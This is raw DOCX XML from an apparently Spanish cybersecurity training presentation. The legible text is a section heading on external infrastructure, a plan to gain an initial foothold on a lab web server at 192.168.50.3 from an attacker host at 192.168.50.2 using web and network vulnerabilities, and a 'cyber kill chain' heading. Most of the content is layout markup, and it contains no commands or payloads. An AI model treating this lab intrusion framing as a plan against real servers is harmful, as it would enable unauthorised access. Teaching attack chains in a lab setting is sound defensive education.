                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="370" name="Textbox 370"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="18F25D71" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="422"/>
                                <w:ind w:left="3229"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>3.1 Descripci</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>ó</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>n general de la infraestructura externa</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="4D4C78C3" id="Group 368" o:spid="_x0000_s1179" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:104.4pt;z-index:15802880;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="121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">
                <v:shape id="Graphic 369" o:spid="_x0000_s1180" style="position:absolute;width:121920;height:13258;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m12192000,l,,,1325879r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 370" o:spid="_x0000_s1181" type="#_x0000_t202" style="position:absolute;width:121920;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8F25D71" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="422"/>
                          <w:ind w:left="3229"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>3.1 Descripci</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>ó</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>n general de la infraestructura externa</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15803392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="649E33D0" wp14:editId="2436A86D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2444467</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>3220170</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7289800" cy="3637915"/>
                <wp:effectExtent l="0" t="0" r="0"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0" cy="3637915"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="7289800" cy="3637915"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="372" name="Image 372"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId178" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="7289348" cy="3637829"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="373" name="Image 373"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId179" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="164620" y="164633"/>
                            <a:ext cx="6973823" cy="3308604"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="159011A0" id="Group 371" o:spid="_x0000_s1026" style="position:absolute;margin-left:192.5pt;margin-top:253.55pt;width:574pt;height:286.45pt;z-index:15803392;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="72898,36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">
                <v:shape id="Image 372" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:72893;height:3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">
                  <v:imagedata r:id="rId180" o:title=""/>
                </v:shape>
                <v:shape id="Image 373" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1646;top:1646;width:69738;height:3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">
                  <v:imagedata r:id="rId181" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EAD5AC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76140897" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799A7247" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351EFD83" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="869"/>
        </w:tabs>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="869" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Como atacante </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">[192.168.50.2] </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">intentaremos conseguir un punto de apoyo inicial en el </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>servidor web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F05DD7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="870"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[192.168.50.3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204CAD04" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="320"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="389636DD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="870"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1980" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Utilizaremos las vulnerabilidades relacionadas con la web y la red para obtener acceso al servidor web</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C39B67" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId182"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C2DC224" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="1538" w:lineRule="exact"/>
        <w:ind w:left="1133" w:right="832"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CADENA DE MUERTE CIBERNÉTICA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327DC582" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0ECB65" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="389D99E3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11257C26" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="661879BF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54037A37" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2474640D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202F18EC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49DBD32D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487663104" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FE82CB8" wp14:editId="690887DA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>108204</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>255994</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="11982450" cy="845185"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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2450" cy="845185"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="11982450" cy="845185"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="377" name="Graphic 377"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="6350"/>
                            <a:ext cx="2615565" cy="832485"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2615565" h="832485">
                                <a:moveTo>
                                  <a:pt x="2199132" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="416052" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2199132" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2615184" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2199132" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="3C67B0"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="378" name="Graphic 378"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2407920" y="6350"/>
                            <a:ext cx="2080260" cy="832485"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2080260" h="832485">
                                <a:moveTo>
                                  <a:pt x="1664208" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="416051" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664208" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2080260" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664208" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="4971BE"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="379" name="Graphic 379"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2407920" y="6350"/>
                            <a:ext cx="2080260" cy="832485"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2080260" h="832485">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1664208" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2080260" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664208" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="416051" y="416051"/>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380" name="Graphic 380"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4279391" y="6350"/>
                            <a:ext cx="2080260" cy="832485"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2080260" h="832485">
                                <a:moveTo>
                                  <a:pt x="1664207" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="416051" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664207" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2080259" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664207" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="5F80C5"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="381" name="Graphic 381"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4279391" y="6350"/>
                            <a:ext cx="2080260" cy="832485"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2080260" h="832485">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1664207" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2080259" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664207" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="416051" y="416051"/>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382" name="Graphic 382"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6150864" y="6350"/>
                            <a:ext cx="2080260" cy="832485"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2080260" h="832485">
                                <a:moveTo>
                                  <a:pt x="1664208" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="416052" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664208" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2080260" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664208" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="758FCA"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="383" name="Graphic 383"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6150864" y="6350"/>
                            <a:ext cx="2080260" cy="832485"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2080260" h="832485">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1664208" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2080260" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664208" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="416052" y="416051"/>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384" name="Graphic 384"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="8023859" y="6350"/>
                            <a:ext cx="2080260" cy="832485"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2080260" h="832485">
                                <a:moveTo>
                                  <a:pt x="1664207" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="416051" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664207" y="832103"/>
